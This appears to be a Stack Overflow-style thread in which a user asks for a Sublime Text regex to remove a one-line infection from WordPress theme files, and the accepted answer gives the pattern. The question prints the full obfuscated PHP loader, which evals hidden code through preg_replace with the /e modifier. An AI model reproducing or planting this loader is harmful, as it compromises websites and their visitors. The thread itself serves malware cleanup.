# Sublime Text regex to remove wordpress themes files infection

Tags: regex, sublimetext

I have a client who had his Wordpress website infected by the famous newsletter plugin/SEO worm.

So I started from a fresh Wordpress install, but his custom theme is only available in the infected version and he has no backup (made by a freelancer unreachable) ...

The infection is just on the first line (I'm sure don't worry :p ) .

It looks like this

```
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yaagutonoj = 'Qtpz)#]341]88M4P8]37]278]225]241]334]3672%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) 25)utjm!|!*5!%x5c%x7827!hmg%y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]27]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%xc^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c7,18R#>q%x5c%x7825V<*#fop60gvodujpo)##-!#~<#%x5c%x782f%x5c%xx782fh%x5c%x7825)n%x5c%x7825-#+I#)0~:<h%x5c%x7825_t%x5c%x7825:osvufs:~5c%x7825%x5c%x7878:-6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x782place("%x2f%50%x2e%52%x29%57%x65",x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)su6%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78}X%x5c%x7824<!%x5c%x7825tzw>!#]y7)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%xx5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#c%x787fw6*CW&)7gj6<*K)ftpmdX^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x78287f_*#ujojRk3%x5c%x7860{6667824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5cqp%x5c%x7825!|Z~!<##!>!2p%%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]x5c%x7825)3of)fepdof%x5c%x7"%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x function fjfgg($n){returnx78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%xl}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)!%x5c%x7825t::!>!%x5c%x7824Ypp5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyidubn%x5c%x7860hfsq)!sp!*5c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x7#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%_*#fmjgk4%x5c%x7860{6~6<tfs%x%x7825s:N}#-%x5c%x7825o:W%x5c%x782x787f;!osvufs}w;*%x5c%x787f!>>%x5%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x7827824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%86057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%xR25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%5-#jt0}Z;0]=]0#)2q%x5c%x782524-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf4-%x5c%x7824b!>!%x5c%mpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg825h00#*<%x5c%x7825nfd)##x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878p5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x782!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y8j%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5cc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x7%x5c%x7822)!gj}1~!<2p%x5c)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R3x7825yy)#}#-#%x5c%x7824-%x5c%x785h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f61]y33]68]y34]68]y33]65]y31]53]y6d]2ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x78x5c%x7825eN+#Qi%x5c%x78x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%248]y83]256]y81]265]y72]254]y76]7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5cc%x5c%x7825}&;ftmbg}%x5c%61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)5dovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x8257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%**f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827x5c%x7825)ppde>u%x5c%x7825V<#65,47]78]K5]53]Kc#<%x5c%x7825tpz!>!#]Dc%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbtcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bu27-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR323zbe!-#jt0*?]+^?]_%x5c%x785c6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]5)ufttj%x5c%x7822)gj6<^#Y#78256<pd%x5c%x7825w6Z6<.3%x5c*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj1]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f25h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rhW~%x5c%x7825fdy)##-!#~<%x5c%x7;!>!}%x5c%x7827;!>>>!}_;gve%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%%x7824*<!%x5c%x7824-%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]s%x5c%x78256~6<%x5c%x787fw6<*K){hnpd19275fubmgoj{h1:|:%x7825bss-%x5c%x7825r%x5c%x7878B)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x78x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x78|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c5c:>1<%x5c%x7825b:>1<!gpsy7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825%x7878:<##:>:h%x5c%x7825:<#x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x782525}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#765ww2)%x5c%x7825w%x5c%x78}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%xy39]271]y83]256]y78]#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7R6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*17824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjuc%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782fq%x5c%x7825:>:r%x5c%x7825:)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x786Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%42]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss134%x78%62%x35%165%x3a%146%x21%75]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]2ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]48]32M3]317]445]212]445]43]321]464]284]364]6]234]3y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<>!#]y84]275]y83]248]y83]256]judovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}3381]y43]78]y33]65]y31]55]y85]82]y76]62x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&if((function_exists("%x6f%142%x5f%163%x74%141%x860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x7877825%x5c%x785cSFWSFT%x5c%x7860%x5c%x87fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.5Ld]55#*<%x5c%x7825bG9}:c%x7822!pd%x5c%x7825)!gj}%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7f%x5c%x7860439275ttfsqnpdov{h19275jx782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5cx5c%x7827jsv%x5c%x78]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", N58]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x78248]322]3]364]6]283]427]36]373P6]36]73]864y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%xx7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782407825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!5c%x7860LDPT7-UFOJ%x5c%x7860GB)99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%ftpmdXA6|7**197-2qj%x5c%:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67yek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo##00;quui#>.%x5c%x7825!<*4l}%x5c%x7827;%x5c%x782h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%#00#W~!%x5c%x7825t2w)##Qtjw)2]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:op%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x6]277]y72]265]y39]274]y85]273]y6g]273]y76]271]<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ULL); }+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f chr(ord($n)-1);} @error_reporting(0); preg_reoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7{ $GLOBALS["%x61%156%x75%156%x61"]=1;epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmd275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]yx7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x782567825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x7855c%x7825)fnbozcYufhA%x587fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x7-#w#)ldbqov>*ofmy%x5c%x783]238M7]381]211M5]67]452]88]5]52]y85]256]y6g]257]y86]267]y74f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x7%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825wx5c%x78786<C%x5c%x7827&6<*rfs%x5c3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5cbE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x725)}.;%x5c%x7860UQPMSVD!-id%x5c%24-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%xfubfsdXA%x5c%x7827K6<%x5c%x787fw6*3q4}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]2x7822l:!}V;3q%x5c%x78985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x2f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%xfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rf5!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%xA6~6<u%x5c%x78257>%x5c%%x7825z>2<!%x5c%x782%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M/(.*)/epreg_replacetgodenjrri'; $savthdkijb = explode(chr((172-128)),'6639,47,39,57,8359,37,1364,26,8276,46,633,34,1297,67,3647,46,9998,54,6236,32,730,67,4866,53,8595,47,8086,50,4270,29,8931,45,6153,35,6589,50,3518,55,978,28,9858,23,3432,54,8976,33,4745,64,9640,65,5067,31,7543,24,1390,61,7444,31,9313,36,2878,67,883,38,8703,23,3000,48,3792,59,7023,20,5407,67,4245,25,6872,55,6686,46,8891,40,6768,55,3282,53,1911,29,8491,64,5819,62,4117,63,8762,44,1054,27,1817,52,8726,36,5683,49,8136,42,3371,38,9221,32,7281,51,4840,26,3622,25,1974,33,6847,25,5967,37,3731,61,4535,40,3242,40,7778,52,1518,62,7378,66,4299,68,452,47,8806,25,96,28,667,63,4052,65,9179,42,2420,57,3048,25,7970,70,499,68,1869,42,921,57,8234,42,7686,24,3851,65,830,53,7733,45,1143,26,2551,42,2351,69,8185,49,1741,25,9588,52,2593,52,7475,68,2502,49,3983,69,7637,49,4367,52,1451,67,1270,27,2113,60,6732,36,9060,56,3693,38,7710,23,9705,59,1680,61,6927,35,5098,23,2945,55,2645,62,9116,63,4575,60,5931,36,4477,58,3916,34,2173,59,3109,45,261,25,8322,37,4919,54,9396,21,5546,67,567,66,2232,28,1580,70,4180,30,797,33,8040,46,5351,56,6464,28,124,45,6268,48,8861,30,7332,46,355,36,7567,70,7830,42,321,34,6074,26,5264,62,5474,27,7191,53,5613,46,7900,70,6492,60,9349,47,7084,69,169,53,5881,50,1006,48,2330,21,3154,32,2260,70,5153,66,9253,60,1081,62,4973,26,2067,46,5219,45,286,35,4999,68,6408,56,1650,30,9009,51,3409,23,1766,51,9764,41,5501,45,8396,35,6100,53,4635,58,6004,70,7872,28,4693,52,5121,32,9901,68,9969,29,9417,68,9534,54,3950,33,411,41,10052,54,1234,36,8555,40,4210,35,6823,24,2707,50,3186,56,4809,31,2477,25,0,39,7153,38,8831,30,6358,50,6188,48,2007,60,3573,49,1940,34,5326,25,3073,36,1169,65,7244,37,9805,53,8642,61,222,39,8431,60,6962,61,9881,20,5659,24,9485,49,391,20,2757,67,5752,67,2824,54,4419,58,6316,42,5732,20,3486,32,3335,36,6552,37,7043,41,8178,7'); $nibnkcwalu=substr($yaagutonoj,(49971-39865),(41-34)); if (!function_exists('twwdyxiyuj')) { function twwdyxiyuj($gfkbogqkzl, $xpwveotxbw) { $bepljhengq = NULL; for($oznuhtwycd=0;$oznuhtwycd<(sizeof($gfkbogqkzl)/2);$oznuhtwycd++) { $bepljhengq .= substr($xpwveotxbw, $gfkbogqkzl[($oznuhtwycd*2)],$gfkbogqkzl[($oznuhtwycd*2)+1]); } return $bepljhengq; };} $azydrlsozu="\x20\57\x2a\40\x73\152\x76\152\x63\167\x61\147\x65\160\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x35\55\x31\71\x38\51\x29\54\x20\143\x68\162\x28\50\x35\71\x36\55\x35\60\x34\51\x29\54\x20\164\x77\167\x64\171\x78\151\x79\165\x6a\50\x24\163\x61\166\x74\150\x64\153\x69\152\x62\54\x24\171\x61\141\x67\165\x74\157\x6e\157\x6a\51\x29\51\x3b\40\x2f\52\x20\145\x63\141\x6f\156\x74\151\x6a\146\x6c\40\x2a\57\x20"; $xpkuyrwixg=substr($yaagutonoj,(30604-20491),(47-35)); $xpkuyrwixg($nibnkcwalu, $azydrlsozu, NULL); $xpkuyrwixg=$azydrlsozu; $xpkuyrwixg=(455-334); $yaagutonoj=$xpkuyrwixg-1; ?>
```

It always start with `<?php if(!isset($GLOBALS[` and ends with `-1; ?>`.

I tried to mess around with sed and regexes, but i can't get it working, i'm very bad with regular expressions ...

So I thought it would be easier to use the Search and replace function from Sublim Text, but I need help to make a regex that matches this pattern:

Something starting with `<?php if(!isset($GLOBALS[` and ending with `-1; ?>`.

Comment: Little off-topic but do you have any link or reference to this newsletter plugin/SEO worm? I'd like to learn more about how it operates and what triggers it?

Answer (score 2, accepted):

```
<\?php if\(!isset\(\$GLOBALS\[.*-1; \?>
```

should be enough for you.

Comment: Love you <3 ! It's working ! Sorry for that newbie question, but I never really understood how RegExs works, I should really get into it ! Thanks again  !

Comment: Love you too <3 , but you should learn regex, it helps making lives easier

Comment: @Kaz `?`, `(`, `[` are meta characters , these characters need to be escaped so that it would match a literal `(`,`?`, `[`